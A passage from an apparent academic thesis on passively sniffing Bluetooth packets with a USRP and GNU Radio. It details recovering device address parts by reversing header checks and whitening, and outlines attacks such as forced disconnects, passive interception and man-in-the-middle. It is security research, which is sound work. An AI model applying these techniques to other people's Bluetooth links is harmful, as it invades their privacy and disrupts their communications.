EV3 - carries up to 30 bytes of data which is not protected by FEC en-
coding.
EV4 - carries up to 120 bytes of data, protected by FEC2/3 encoding.
EV5 - carries up to 180 bytes of data which is not protected by FEC encod-
ing.
2.3.4 Payload
The payload is different for each packet type, some, such as the DH1/2/3 or
DM1/2/3 packets, have a payload header followed by a variable length data
field and a CRC. Others, such as the EV3/4/5 packets, have a fixed length of
data which is chosen at the establishment of communication, followed by a
CRC. The DV packet is a combination with an 80 bit voice field followed by a
variable length data field and CRC. For voice data there are HV1/2/3 pack-
ets which have a fixed length and no CRC, they are also never retransmitted.
For the packets that contain a variable length data field there is a pay-
load header which also contains a link ID; this is only used for asynchronous
packets, i.e. packets that are retransmitted in the event of failure.
A number of the packet types have forward error correction applied to
the payload, some use the FEC1/3 scheme where each bit is simply repeated
three times, an average can be taken in order to get the original data back.
Other packets use the FEC2/3 scheme which produces five bits of parity data
for every ten bits of the payload; the packet is divided into blocks of ten bits
followed by the parity data for that block, the final block is padded with ‘0’s
to produce a block of ten bits.
CHAPTER 2. BACKGROUND 12
2.3.5 Data whitening
The packet header and payload are whitened on every packet, except the
ID packet which has neither header nor payload, by XORing the bits with
a data from a LFSR. This LFSR takes six bits of the clock value as input
and produces a stream of binary to XOR with the packet data. Due to the
input being limited the LFSR only has 64 possible starting values, and 127
possible output values, the register cannot be set or reach a state where it is
0. This is only done once a connection has been established and both devices
are using a common clock.
2.4 Bluetooth connection protocol
Bluetooth devices have a pattern of frequencies that they transmit on set by
their MAC address and clock signal. If two devices wish to communicate they
must be synchronised in their hopping and, as Bluetooth is a one-to-many
protocol, they must be able to address the packets for the intended recipi-
ent. This is done through the inquiry process which takes place at the start
of communications to establish hopping patterns, identifiers and encryption
keys.
One of the devices initiates the communication, this is designated as the
master device, the the other device is the slave; this can be changed later
in communications for devices that only operate as a slave such as wireless
headsets. In order to communicate with a device it must first be found, this
is done by hopping through only 32 frequencies at a higher rate, 3200 times
per second, transmitting only the ID packet, (see section 2.3.1).
When a device receives the ID packet on a frequency that it is listening
to it replies on the same frequency 625us later. The master device will return
to the frequency in order to listen for the reply. The slave device responds
with an FHS packet which contains all of the MAC address and clock data,
this can be used to calculate the hopping pattern and sniff packets from the
CHAPTER 2. BACKGROUND 13
device, it is therefore ignored by many devices to avoid denial of service at-
tacks and snooping.
If the devices wish to communicate after the inquiry phase is complete
then the master is able to copy the hopping pattern of the slave device, using
the data in the FHS packet, and begin to establish a connection.
2.5 Passive vs active attacks
At some point while devising an attack against a system the decision must
be made as to how to perform the attack. The possibilities generally fall into
two camps, passive and active attacks.
Passive - A passive attack is one in which the victims are not interfered
with, and can therefore be completely unaware of the attack. This style
of attack also does not require data to be transmitted, which reduces the
complexity of it. However services provided by Bluetooth devices cannot be
hijacked without communicating with them, so a passive attack has limited
use. For intercepting voice and file transfers that use Bluetooth a passive
attack will suffice.
Pros Undetectable, could potentially listen to multiple simultaneous com-
munications.
Cons May be computationally intensive and therefore slow, only allows
packet sniffing.
Active - An active method opens up many more avenues of attack, such as
disrupting communication and sniffing the packets sent for re-establishment.
In many respects this is easier than a passive attack as there is no need to
calculate the LAP, UAP and clock. However, it requires transmission which
adds to the complexity, and if the attack involves an attempt to connect to
the master device, it can be ignored.
Pros More simple computation, often quicker, allow use of services rather
CHAPTER 2. BACKGROUND 14
than just sniffing packets.
Cons Can be detected and therefore avoided.
2.6 Related work
There are a number of projects and products that overlap with this work,
from Bluetooth device drivers and protocol stacks to tools that sniff commu-
nication between a device and its CPU. Bluez[ 9], the linux Bluetooth stack
contains many tools and drivers to perform functions outside of the normal
operation of Bluetooth. The opencores[ 10] project aims to create open source
implementations of hardware devices such as Bluetooth baseband implemen-
tations, however the project is stale, it has not be modified since 2001, and
it is still considered alpha.
There have also been a number of published Bluetooth exploits in recent
years, such as the work of Yaniv Shaked in obtaining the pin exchanged
at the establishment of communications[ 13]. The trifinite.org[ 14] group also
maintains a list of tools and exploits for Bluetooth devices, most of which are
device specific and due to flaws in the specific implementation rather than
general protocol attacks.
FTS4BT[ 15] is a commercial Bluetooth V2.0 sniffing application that
comes with specific hardware for sniffing traffic, it is expensive and is more
or less a commercial, closed source, version of what is attempted here. It is
aimed at debugging implementations and allows sniffing to take place within
the host system so that the sniffed packets can be associated with the in-
tended transmission data internally. The BTTracer from LeCroy also allows
this functionality, but it requires the MAC address of the device to be known
prior to packet sniffing.
For any of a number of attacks to be carried out there needs to be the
ability to sniff packets from an arbitrary connection, this has, as yet, not
been achieved, and is the aim of this work.
Chapter 3
Finding the signal
Bluetooth packets could not be sniffed and decoded until they had been
received using the GNU Radio, this is not as simple as with other technologies
due to the large amount of variation in the signal introduced to avoid hopping.
The breakthrough in finding the signal and being able to interpret it came
with the discovery of an obscure tool for manipulating the Bluetooth test
modes.
3.1 Why does the signal need to be found?
Unlike most communication protocols which operate on a singal frequency
for a given connection, such as 802.11 and GSM, Bluetooth uses a technique
called frequency hopping spread spectrum (FHSS). FHSS allows many more
devices to share a set of frequency bands by moving a communication from
frequency to frequency whilst in progress. This is different to 802.11 which
uses multiple frequency, but each device operates on a single frequency for
the entire length of the communication.
3.2 Details of the signal
The frequencies used in Bluetooth communications range from 2.402GHz to
2.480GHz inclusive at 1MHz intervals. Not all possible frequencies are used
15
CHAPTER 3. FINDING THE SIGNAL 16
for all communications as some are restricted in some parts of the world, but
for the scope of this work all frequencies will be treated as used as this is the
most common case. The frequency hops every 625us and the hopping pattern
is calculated from the clock and MAC address of the master device which
are only sent from master to slave at the establishment of communication.
The data is modulated using Gaussian Frequency Shift Keying (GFSK)
which is a variant of Gaussian Minimum Shift Keying (GMSK) that has a
specific frequency shift of 115KHz. It has a symbol rate of 1MS/s, which,
when taken with the sampling rate of the GNU Radio in the 2.4GHz band,
give a total of four samples per symbol (bit). When these parameters are
passed to the GMSK demodulator from the GNU Radio project it is able
to demodulate Bluetooth packets. These values were not given in the radio
section of the Bluetooth specification document, they had to be discovered
experimentally.
3.3 Experiments
An array of different experimentation methods were used in an attempt to
receive and demodulate a signal generated by a Bluetooth device, these in-
cluded listening on a single frequency, attempts to transmit and attempts
to predict the hopping pattern of a device. The complexity came from the
number of variables involved in the process, all of which had to set correctly
in order to accomplish this. The first, and most obvious method for finding
a Bluetooth signal is to tune to a single frequency and wait for the device
to hop past. This comes with a number of problems, the first of which is
knowing how to be sure that a signal has been received as opposed to a peak
in noise or data from an 802.11b/g device or cordless phone.
Bluetooth data had not been previously received using the USRP and
GNU Radio although the hardware was capable of receiving and demodulat-
ing the signal. The answer to this was to attempt to demodulate the signal,
and identify whether it was a Bluetooth packet, but with the signal chang-
CHAPTER 3. FINDING THE SIGNAL 17
ing frequency 1600 times per second and three unknown parameters to the
demodulator, this was not a simple task.
3.3.1 Random stabbing in the dark
With the device tuned to a single frequency the simplest packet was chosen
to be transmitted, the ID packet; it was chosen because it is 68 bits and
therefore long enough to be fairly certain that it is not noise, it is also easy
to transmit with the command hcitool scan . The demodulator processed
the signal from the USRP and wrote the demodulated data to file. A simple
tool called bindump was written to take the output from the demodulator
and convert it to ASCII characters ‘0’ and ‘1’. The output could be searched
with the standard UNIX tool grep .
The output from this revealed no ID packets or other packet types. The
process was repeated on another frequency, and adjusted to small deviations
of frequency, up to 100KHz either side of the centre frequency. When this
yielded no results the various parameters given to the USRP and the demod-
ulator were altered whilst continuing transmission on the single frequency.
It became clear that some of the variables needed to be removed from the
equation in order to find appropriate values for the others.
3.3.2 Test packets
Investigation of the linux Bluetooth stack (bluez) led to the discovery of a
tool for controlling the CSR debug mode (bccmd) which has a rttxdata1 test
mode. The test transmits the same packet repeatedly on a single frequency,
the packet is not whitened; this was used to transmit on a single frequency,
2421MHz was chosen to reduce noise because it was below the CPU clock
signal in the host system. Radio tests transmitted on one frequency elimi-
nated the most difficult variable in the system, the frequency hopping.
The USRP was then tuned to the frequency and the oscilloscope was
used to view the signal visually. The oscilloscope was modified to take file
CHAPTER 3. FINDING THE SIGNAL 18
input, so that files of sampled signals could be viewed in order to find a file
containing a single test packet. A file splitter was created to take a large file
and cut it into smaller pieces for viewing with the oscilloscope, this process
was refined until a file containing a single packet was produced.
Figure 3.1: Oscilloscope with a single Bluetooth packet shown
The file containing the single test packet was passed into a python script
that ran it through the GMSK demodulator, with settings as described in
section 3.2and using default values for the unknowns. Still nothing came
through the demodulator, so the oscilloscope was used to calculate the length
of the packet (approx 400us). The test packet consists of 366 bits, which cor-
responds to approximately one bit per microsecond, while the USRP samples
at 4 samples per microsecond, which gives a samples per symbol value of four.
The output was dumped to file as ASCII characters using bindump so
that the packet could be found by hand. Finding the packet this way was
made easier by the FEC1/3 encoding on the header (see section 2.3.2) and
the repetitiveness of the data.
CHAPTER 3. FINDING THE SIGNAL 19
000101111101011101010101010101010101010101010101010101010101010 1010
10110111110011000010110110011001100111111001101001011000111
10010101011111111100000011100000000000000000000011111111100
00001111000011110000111100001111000011110000111100001111000
01111000011110000111100001111000011110000111100001111000011
11000011110000111100001111000011110000111100001111000011110
00011110000111100001111000011110000111100000000100001111100
0101010011100011101101110011101101001101000100001000101010000
Figure 3.2: Demodulated output of packet shown in Figure 3.1
The process of demodulating a single packet in a file is able to be scaled
well to multiple packets as the demodulator works on stream data and will
pass all packets through, this was tested with up to ten packets by hand,
and then shown by the reception rate compared with transmission rate to
be at least 80% successful. As the packets were coming through the demod-
ulator it was considered that the correct settings had been found to receive
the Bluetooth radio layer, but softare was needed in order to extract useful
information from these packets.
Chapter 4
Interpreting the signal
Once test packets had been found they needed to be interpreted, and data
extracted from them. This was a fairly straight forward process for the test
packets as they are not whitened and always carry the same LAP and UAP,
so the data in them was extremely repetitive. However, the whitened packets
from real transmissions were more difficult to interpret as the whitening had
to be brute forced, this resulted in a list of 64 possible UAP values being
given. When counted over a number of packets a set of 32 come out as the
most likely, but it is not possible to determine the real value with a high
enough accuracy.
4.1 Deciphering test packets
The test packets are all transmitted with the same MAC address and there-
fore always have the same access code, set by the same LAP. This means
that the first 72 bits of each test packet are always the same, so they can be
found from the output file by simple searching. Once found the header can
have the FEC1/3 removed and the HEC can be calculated to check that it
matches or, if required, the HEC calculation can be reversed to give the UAP
as output. The type of packet can be extracted from the packet header, all
of the test packets default to DH1 packet types.
20
CHAPTER 4. INTERPRETING THE SIGNAL 21
The DH1 packets have a payload header which gives the length of the
packet along with an ID. The payload header can be read along with the data
to calculate the CRC which is initialised with the UAP. This can confirm the
UAP if it is calculated from the header. The output of the program written
to do this is given in Figure 4.1.
UAP confirmed by CRC check
LAP:c6967e UAP:6b
Type: DH1 Slots:1 Length:27
Figure 4.1: Information extracted from the test packets
4.2 Real packets
The discovery of packets from a Bluetooth device working normally, i.e. not
in a debug mode, was almost accidental. The bluetooth.dump block was
being tested with the USRP, the time for the block to stop producing output
was being measure so that the delay in processing could be estimated. After
the test mode was turned off three packets were received with the LAP of
the Bluetooth device and varying UAPs, this is due to the whitening of the
header which stopped the UAP being calculated from the HEC. These are
shown in Figure 4.2.
This led to direct experimentation with two devices, using the l2ping
tool to send repeated POLL and NULL packets between the devices. The
LAP was extracted and compared to the access code to check that it was
valid. Over a number of packets these were counted and when no new LAPs
had been found for a time the list was printed to the screen as in Figure 4.3.
These packets were whitened, so the packet dumping functions that had
been used previously did not work, in particular the method of deriving the
UAP from the header and HEC does not work as the whitened data produces
64 possible packet headers, giving up to 64 possible UAPs per packet. The
CHAPTER 4. INTERPRETING THE SIGNAL 22
Length:10
UAP could not be confirmed by payload
LAP:b30a5b UAP:56
Type: HV1 Slots:1 Length:10
No payload
LAP:b30a5b UAP:16
Type: POLL Slots:1 Length:0
No payload
LAP:b30a5b UAP:0f
Type: POLL Slots:1 Length:0
Figure 4.2: Real packets with a whitened header and payload
list of UAPs is noted for each packet, and this can be used to identify the
most common UAP, which should belong to the master device.
However the voting method produced inaccurate results as the same set
of 32 UAPs come out each time (shown in Figure 4.5), always gaining more
votes than the number of transmitted packets.
This was put down to the same UAP coming from different versions of the
header after whitening. The UAP extracting algorithm was then adapted to
attempt to match on other data in the header which yielded similar results
and still gave the same 32 UAPs. The same technique could be applied to
other payload data, but these have variable lengths and there is no garuntee
that the rest of the packet has been demodulated in order to process it.
Bluetooth LAP finder
Found LAP:0x452b6c 14 times
Found LAP:0xb30a5b 25 times
Figure 4.3: LAPs found in the within range
CHAPTER 4. INTERPRETING THE SIGNAL 23
The list of 32 UAPs is too large to ping all possible combinations of UAP
and NAP, even if filtering is done to select only the addresses in the OUI.txt
file from the IEEE[ 16]. The OUI.txt file lists all of the upper halves of MAC
addresses that have been assigned to manufactureres by the IEEE. However,
if the manufacturer is taken into account a database could be built of likely
and unlikely UAP and NAP pairs which may speed this process.
4.3 32 possible UAPs
The list of 32 possible UAPs that comes from brute forcing the whitening
and reversing the HEC calculation is constant for the UAPs that appear in
it; i.e. if one of the UAPs that appear in Figure 4.5is set as the UAP for
a device, the same set of 32 possibilities comes out. If a UAP that is not
in the list is used then another set of 32 possibilities is found, these are also
constant for the UAPs in the set. With 32 UAPs per set there are eight
sets of possibilities. Each set has two entries for each of the most significant
nibbles, and the least significant nibbles will be defined by the pairs: 4/f,
6/d, 0/b, 2/9, 7/c, 5/e, 3/8, 1/a.
These pairs also appear to come in two sets of four with 7/c, 5/e, 3/8
and 1/a in one set, and 4/f, 6/d, 0/b and 2/9 in the other. The order of
these sets changes, with the pairs always remaining together. The number of
occurrences of these addresses are the same, the packets that give the correct
output value also give all of the other 31 values, the packets which do not
give all of these 32 values give none of them, and give a random set of other
results, it is assumed that there are bit errors in these packets, and they are
disregarded.
At this point the validity of the HEC reversal and whitening removal are
questionable, but the testing in section 5.6.2 shows that both conform to the
specification. This leaves the option that Bluetooth was designed this way,
either it was a mistake and it is a flaw that allows the sniffing of a single
packet to reveal four bytes of the MAC address to within 32 possibilities, or
CHAPTER 4. INTERPRETING THE SIGNAL 24
the whitening algorithm was designed to work with the HEC algorithm to
give a set of 32 possibilities rather than just the one correct one.
The list of 32 UAP candidates could be reduced depending on their packet
type, for example a DH1 packet has a variable length payload followed by
a CRC which could be checked, an EV3 packet has a fixed payload length
(unknown at time of sniffing) which is also followed by a CRC. The packet
types are also often used in groups, i.e. the HV packets are used together,
as are the EV packets, and the DH and DM packets appear in the same
connections, this makes it possible to filter the packets on the connection
ID, and type of packets being used in that connection. The generic control
packets (NULL, POLL, etc) are added to all of the groups as they are used
with each connection type.
This method of filtering produces results with the correct value often, but
not always, having the maximum number of votes, or being close to it, but it
is almost never alone at the top of the group. This situation remains the same
as the number of packets is increased, so that 5000 packets has no advantage
over 100 packets. The extra filtering does however reduce the likely options,
cutting off either end of the list; these results are shown in Figure 4.4. They
also have the most common LT ADDR shown for each UAP, the chances are
high that the correct result has an LT ADDR of 1 because there are only
two devices in the piconet, if information about a piconet is known, then this
can be used to make an intelligent guess at the identity of the correct UAP.
In this case the possibilities are narrowed from 256 to 4.
CHAPTER 4. INTERPRETING THE SIGNAL 25
40 -> 53 votes -> LT_ADDR 5
4b -> 56 votes -> LT_ADDR 5
52 -> 56 votes -> LT_ADDR 3
59 -> 54 votes -> LT_ADDR 3
60 -> 56 votes -> LT_ADDR 7
6b -> 54 votes -> LT_ADDR 7
72 -> 54 votes -> LT_ADDR 1
79 -> 56 votes -> LT_ADDR 1
84 -> 52 votes -> LT_ADDR 7
8f -> 54 votes -> LT_ADDR 7
96 -> 54 votes -> LT_ADDR 1
9d -> 53 votes -> LT_ADDR 1
a4 -> 54 votes -> LT_ADDR 5
af -> 53 votes -> LT_ADDR 5
b6 -> 51 votes -> LT_ADDR 3
bd -> 54 votes -> LT_ADDR 3
Figure 4.4: Filtered output of the Bluetooth UAP finder, 72 is the correct
value, it also has an LT ADDR of 1
CHAPTER 4. INTERPRETING THE SIGNAL 26
Possible UAPs within 20% of max value
max value=46
00−>38votes
0b−>42votes
12−>38votes
19−>46votes < − − −− Highest voted value
20−>39votes
2b−>42votes
32−>37votes
39−>46votes
40−>43votes
4b−>38votes
52−>42votes
59−>38votes
60−>42votes
6b−>37votes
72−>42votes < − − −− Correct value
79−>39votes
84−>40votes
8f−>43votes
96−>39votes
9d−>41votes
a4−>39votes
af−>41votes
b6−>41votes
bd−>41votes
c4−>42votes
cf−>37votes
d6−>44votes
dd−>39votes
e4−>44votes
ef−>38votes
f6−>42votes
fd−>38votes
Figure 4.5: Output of the Bluetooth UAP finder, the correct value is 72, but
the most votes go to 19
Chapter 5
Implemented functions
The finding and interpreting of a signal is of little use unless it can be reliably
repeated, a detailed description of the setup used follows. This starts with
the physical layout of the hardware components, follows with a description
of the scripts and software functions used to convert an analogue signal to
digital data, and finishes with tools to extract information from the data.
5.1 Experimental setup
5.1.1 Physical layout
Figure 5.1: Hardware setup for receiving Bluetooth
27
CHAPTER 5. IMPLEMENTED FUNCTIONS 28
The devices were arranged as in the Figure 5.1.1, with a minimum of
12.5cm (one full wavelength at 2.4GHz) between the Bluetooth USB device
and the antenna for the radio. The antenna must be pointed away from
the host system as many CPUs have a clock signal that is in the 2.4GHz
frequency band, and this causes a large amount of noise and interference.
5.1.2 Data flow of the signal
Figure 5.1.2 shows the stages that the signal received by the radio must pass
through in order to be processed. These modules are part of the GNU Radio
framework, from the USRP hardware, to the software filters and demodu-
lators that come with the software framework. The Bluetooth module was
written in order to process the binary data that comes from the demodulator.
Figure 5.2: Flow of data within the GNU Radio software
The USRP control, filters and GMSK demodulator are part of the GNU
Radio framework, however the Bluetooth specific block was written for this
work, and therefore the contents of it is described in greater depth below.
5.2 GNU Radio gr-bluetooth block
The various methods and functions that have been implemented have been
incorporated into a GNU Radio block which, following the GNU Radio con-
vention, is names gr-bluetooth. The structure of the source and build files
CHAPTER 5. IMPLEMENTED FUNCTIONS 29
is taken from the example block (gr-howto). The Bluetooth block has four
modules: dump, LAP, UAP and sniffer, which are described below.
5.2.1 Modules
Bluetooth.dump Dumps packet information to stdout based on packets
found. Gives the LAP, UAP, and length of the packets found. It does not
work on whitened data, only on the CSR test packets. It uses acgen(),
sniffac(), unfec13()
Bluetooth.LAP Looks at traffic to sniff for access codes, then checks that
they match the LAP that created them. Gives a list of LAPs found, exits
when it only finds LAPs that it has already checked. Uses acgen() and
sniffac().
Bluetooth.UAP Takes an argument of a given LAP and only examines
packets from the piconet that uses the associated access code. This will give
packets that have been sent or received in the piconet that we wish to listen
to. From these packets the UAP of the master device is determined. It uses
acgen(), sniffac(), unfec13(), unwhiten() and UAP from hec()
Bluetooth.sniffer Bluetooth sniffer is intended to be a full implementa-
tion of the above functions, i.e. it will find packets within a stream given an
unknown LAP, identify the LAP and then attempt to identify the UAP from
the packet headers and possibly other packet data. Once this data is found
it should sniff packets to confirm. It can handle multiple packet types and
perform CRC check where required. However, due to the problems in finding
the UAP of other devices it is not fully functional, and largely untested. It
uses all of the common functions including crcgen() and unfec23(). The flow
of data through the sniffer is shown in the Figure 5.3.
CHAPTER 5. IMPLEMENTED FUNCTIONS 30
Figure 5.3: Function involved in processing packets
5.3 How the modules work
All of the modules written are based around the same functions, the most
important of which are described here. This is shown in order the that the
signal is passed to them, as in Figure 5.3.
CHAPTER 5. IMPLEMENTED FUNCTIONS 31
5.3.1 Access Code
acgen() creates an access code (as described in 2.3.1, including preamble,
syncword and trailer, from a given LAP. It uses the codeword function, writ-
ten by Dr Robert Morelos-Zaragoza of San Jose State University, to produce
the codeword, then combines this with the LAP and preamble/trailer to re-
turn data to the calling function.
sniffac() works through a stream of data to find the preamble andtrailer of
an access code at the correct distance apart. It then takes the portion that
represents the LAP and uses acgen() to calculate the codeword . The created
access code is then compared to the one that was sniffed, and the offset of
the packet in the stream is returned if it matches.
10101011011111001100001011011001100110 011111100110100101100011 1100101010
5.3.2 Header
unfec13() removes the FEC 1/3 encoding from the packet header and/or
payload, by averaging sets of three bits. Input and output are both in one-
LSB-per-byte format.
unwhiten header() is used to unwhiten 18 bits based on a given clock
value, this is implemented using two arrays, one contains 64 entries and is a
look up table for the index into the second. The second array contains 127
bits of whitening data to XOR with the packet header, the 18 bits from the
index onwards are XORed with the received header to reveal the intended
header data.
hecgen() implements exactly the LFSR that creates the HEC from the
header. It takes the stream of data and the UAP of the master device in and
produces the HEC for the header of the packet.
UAP from hec() reverses the hecgen() by taking the header, complete with
CHAPTER 5. IMPLEMENTED FUNCTIONS 32
HEC, and running the process backwards starting with the HEC and working
back to the UAP. It works almost exactly as the hecgen() does, but it was
implemented directly from the specification in order to use the two functions
to test each other.
5.3.3 Payload
crcgen() is similar to hecgen() but it implements the LFSR for creating the
CRC, and takes the length of the packet as an argument because it is applied
to variable length data.
unfec23() removes the FEC 2/3 encoding from the payload if required.
It takes the payload ten bits at a time and drops the 5bit FEC code. This
was chosen as the best way to deal with the FEC 2/3 packets, because the
payload is not of concern at this stage of the work. Also, if there is a CRC
then this will show signs of errors in transmission, and the FEC codes can
then be explored. This increases the speed at which the system operates
when the reception is good and errors are infrequent. Input and output are
both in one-LSB-per-byte format.
5.4 GNU Radio scripts
There are four scripts that accompany the above functions that are used to
execute them from the command line. bluetooth LAP sniffer.py takes a fre-
quency and gain, it runs the bluetooth.LAP module to find the LAPs being
used within range. bluetooth UAP sniffer.py takes a frequency, gain, LAP
and a number of packets and passes this data to the bluetooth.UAP module.
bluetooth dump.py and bluetooth sniffer.py are more complete applica-
tions, bluetooth dump.py reads from the USRP on a single frequency and
dumps all received packets to stdout, it does not handle any whitening. It
is useful for testing that the setup is correct but using it with the CSR test
packets. bluetooth sniffer.py is an attempt at a full implementation of a
CHAPTER 5. IMPLEMENTED FUNCTIONS 33
packet sniffer on a single frequency, it runs the bluetooth.sniffer module.
5.5 bccmd
One of the tools that comes as part of the bluez utilities package is bccmd. It
is mostly used to access the debug modes of the Bluetooth devices that were
designed by Cambridge Silicon Radio. The debug mode allows the device
to be locked to a single frequency and then forced to transmit simple test
packets.
The packet type, length and content of the test packets are configurable
in the debug mode on the CSR chips, but this was unimplemented in bccmd
because so far it had not been required. A packet config function was added,
and the ability to select the specific radio test was added to the existing radio
test function.
CHAPTER 5. IMPLEMENTED FUNCTIONS 34
5.6 Testing
The methods of testing the various functions involved in extracting informa-
tion from the data stream produced by the GNU Radio are shown below.
The results of these tests are given in Appendix C
5.6.1 Access code
acgen() , the access code generator, was tested using sample data given in
part G, section 3 of the Bluetooth specification v1.2[ 7]. The acgen() function
was put into a separate C file along with all functions that it calls, the LAPs
that are given in the specification were passed to it in turn, and the output
dumped to stdout. This was piped to file, which was compared to the sample
data using diff.
sniff ac() was tested with the USRP data after packets had been found
by the packet finder, the sniffer was able to be tested on files that were
known to contain a packet as well as data from the USRP.
unfec13() was tested using sample data, and by review of the code as it
is a simple function.
5.6.2 Header
unwhiten header() , the packet whitening remover was tested using the
sample data given in part G, section 7 of the Bluetooth specification v1.2[ 7].
The data was put into a file, and the packet whitener was initialised with
the value 0x3f (the first in the list of sample data), it was then run until the
shift register had the same value in again, meaning one full cycle of values
had been generated. As the only input to the packet whitening algorithm
is the clock at the start, after this no input is given, so this test represents
every possible state of the shift register.
hecgen() was tested with the data in the part G, section 4 of the speci-
CHAPTER 5. IMPLEMENTED FUNCTIONS 35
fication. It was also tested by UAP from hec(), as both were implemented
from the specification details in order to test them against one another.
UAP from hec() was tested with the known to be working hecgen(), the
data from one was passed to the other to see if the expected UAP could be
derived. The USRP captured data was used to test that the correct UAP
was produced.
5.6.3 Payload
crcgen() was also tested against the data in the spec, although this was
minimal, so the data captured by the USRP from the CSR test packets was
also used.
unfec23() ) was tested using sample data, and by review of the code as
it is a simple function. If it was required to calculate the parity bits it would
be tested against the data in part G section 8 of the spec.
Chapter 6
Evaluation
The work in this project is difficult to evaluate in the way that most network-
ing research is evaluated because it does not deliver a numerical improvement
or a service that can be statistically analysed. The result of the work is that
packets are sniffed, and information is extracted from them in real time. This
provides a significant advance in the field of Bluetooth hacking as this has
not been possible up to this point, but it is not an outcome that can be
shown in a graph or a bar chart.
6.1 The USRP’s role in Bluetooth hacking
One of the larger outcomes of this work has been to show that the USRP
device, along with the GNU Radio software is able to read and demodulate
packets from a connection between two Bluetooth devices. This alone assures
its use in Bluetooth future Bluetooth hacking based on the radio layer, but
the flexibility of the software to allow this to be coupled with information
extraction in one process means that it could be used as the basis for a single
tool to perform an attack.
The only drawback that the hardware may have is a potential show stop-
per. The length of time it takes the device to re-tune to a frequency is
roughly one third of the length of a packet, which would result in packets
36
CHAPTER 6. EVALUATION 37
being missed as the radio attempted to tune to the frequency of the next
hop. This does not have to be a problem though as there is the possibil-
ity of installing a second daughterboard, and hence a second receiver into a
USRP device, giving two radios which can alternate their hopping. The use
of two radios in one device would allow each dubdevice 625us to tune, which
is ample time.
6.2 Exploiting the Bluetooth protocol
Now that the place of the USRP device in Bluetooth hacking has been assured
the feasibility of attacking the protocol at the radio and baseband layers needs
to be evaluated.
6.2.1 Finding the MAC
The three least significant bytes of the MAC address of the master device can
be found simply from reception of a single packet, and this may be confirmed
with subsequent packets. The NAP cannot be found from standard packets,
it is only transmitted in the FHS packet but if the UAP is known, then the
OUI.txt file from the IEEE can be used to narrow the search down to tens
rather than thousands of possibilities.
The real trick is in finding the UAP of a device, this can be done by
reversing the error check on the header. This is an extremely useful tech-
nique as it means that a specific packet does not need to be waited for or
the connection disrupted in order to get the UAP. However, the process be-
comes more difficult when the packet whitening comes into the equation as
this can only be removed with brute force, which provides 64 possible UAP
candidates. Filtering, and some knowledge of the connection, helps to reduce
this list of candidates to less than 10, which gives a much higher chance of
snooping a connection.
CHAPTER 6. EVALUATION 38
6.2.2 Finding the clock
There are a number of possible ways of finding the clock signal which were in-
vestigated, but until the MAC address can be found they will remain entirely
theoretical. These either involve reversing the hopping algorithm, or learning
the full address of the device and attempting to ping it, which would result
in it revealing the hopping pattern. The more reliable option is to guess the
NAP of the device as there are roughly thirty NAPs per UAP in the OUI.txt
file available from the IEEE. This will be a lot quicker than trying to reverse
the hopping pattern.
However, part of the clock signal can be derived by removing the whiten-
ing from a packet, and this will reduce the amount of the clock signal to
be discovered. Also, this method is less invasive than pinging devices, and
therefore can still sniff packets from a device that ignores l2ping requests.
There does not seem to be a method for calculating the rest of the clock
from transmitted packets without receiving an FHS packet.
It may be possible to reverse the hopping selection algorithm without
interpreting any packets, using fast Fourier transforms and observations of
the frequency range. This would reveal the MAC address and clock of the
master device so that the hopping pattern could be derived and followed,
gaining the advantage of not having to deal with extracting the UAP from
whitened packets. A patent is held on this technique by Cognio Inc[ 12].
This would require multiple USRP devices, or even custom hardware with a
very wide bandwidth, which reduces the possibility of it being carried out by
anyone but a well funded attacker.
6.2.3 Putting it all together
As the entire MAC could not be found, and only six bits of the clock could
be estimated, but not known, implementing hopping was not possible, but
assuming that this information had been found the attacks that could now
be perpetrated need to be investigated. A number of possibilities are given.
CHAPTER 6. EVALUATION 39
Force disconnect
At the logical link layer of the protocol the devices see the baseband layer
as a fixed communication link. The devices need a method for disconnecting
when they are done with the link, and this is done with a disconnect packet.
If a disconnect packet is received by a device it will drop the link described
in the packet.
This will force the connection to be re-established if either device still
wishes to send data, meaning that the FHS packet will be sent from the
master device to the slave. This can then be sniffed by the USRP and the
data can then be extracted, giving the MAC address and clock values.
Following the reception of the MAC and clock values the hopping pat-
tern could be followed and the data sniffed. Whitening would also not be a
problem as the clock value is known.
Sniff data
Sniffing data as a purely passive attack is a preferred option as it will not
rouse suspicion and is therefore very difficult to detect and protect against.
This would work the same way that the “Force disconnect” attack does, but
instead of forcing the disconnect to view an FHS packet, the connection is
observed passively to calculate the MAC and clock value. This could possibly
be achieved by viewing the frequency hopping pattern using and reversing
the hopping selection algorithm to get the MAC and clock.
Man in the middle
A man in the middle attack is less likely to be successful as the devices
communication will often be within range of one another, and the interference
from the hopping patterns would need to mitigated somehow. This attack
would involved forcing disconnect, and then appearing as the two devices to
each other, this is complicated, and the timing may be critical. It is less
likely to succeed than the previous suggestions.
Chapter 7
Conclusions
7.1 Have the aims been met?
The aims set out for this work were to implement packet sniffing and injecting
for Bluetooth using the GNU Radio and USRP device. To a certain extent
sniffing packets is now possible, but some of the functionality required to
fully sniff communication between two devices is not available yet. This is
due to the constraints of the USRP hardware when frequency hopping and
the complexity of extracting the UAP from the packet; the further work
section includes suggestions as to how to accomplish these.
7.2 Why is this not a full implementation?
7.2.1 Finding the signal
The decision was taken fairly early in the project to avoid a direct imple-
mentation of Bluetooth using the GNU Radio, as this was not going to be
of much use. Anyone who wishes to use Bluetooth for communication can
simply use a $10 USB device rather than a $1000 software defined radio, but
for sniffing packets a standard device may not suffice.
The added complexity in finding, demodulating and interpreting a Blue-
tooth signal was a large hurdle to finding and exploiting flaws in the security
40
CHAPTER 7. CONCLUSIONS 41
of Bluetooth, although it was a task that has helped a number of people to
investigate the protocol at the radio and baseband layers, and it will hope-
fully lead to future developments in the field. Most of the theoretical exploits
for Bluetooth, that have been release to date, cannot be practically applied
without the ability to sniff data at the baseband level. All further work,
described in Chapter 8, is with a view to implementing one of these attacks.
7.2.2 Lack of frequency hopping
The USRP daughterboards cannot tune to a frequency quickly enough to
keep up with the hopping pattern of Bluetooth, which hops to a new fre-
quency every 625us in order to spread the transmissions[ 7]. The RFX-2400
daughterboard to the USRP takes around 200us to settle to a frequency when
a tune command is issued[ 11].
This means that roughly the first third of a transmission slot will be
missed as the radio tunes to the frequency. This factor could be reduced
by using the transmit and receive paths of the daughterboard or adding a
second board; although this will double the data transferred over USB, the
bus should be able to handle it as it presently uses 4Mb of bandwidth but
can support up to 32Mb, which would be plenty for two daughterboards with
two receivers on each. The tune time is also likely to be less if the frequency
is within a few MHz of the current setting, but this is untested.
7.3 Software written
The software written and described in this document is a proof of concept, it
shows that the USRP device can sniff packets, and they can be demodulated.
It also shows that information, such as the lower half of the MAC, and six
